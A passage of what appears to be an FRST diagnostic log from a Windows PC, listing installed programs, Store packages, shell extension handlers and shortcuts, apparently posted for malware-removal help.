PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.)
PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes)
qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project)
Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner)
RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations)
REAPER (x64) (HKLM\...\REAPER) (Version:  - )
Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version:  - FIFA MASTER)
REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.)
rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden
Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC)
Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson)
Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden
thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc)
Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version:  - )
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software)
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares)
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden
VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version:  - )
vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden
VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX)
Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden
Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l)
Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ)
WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden
WinAutomation (HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version:  - wxWidgets)
X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises)
ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic)

Packages:
=========
Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad]
Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad]
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23]
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> )
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH)
ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat ()
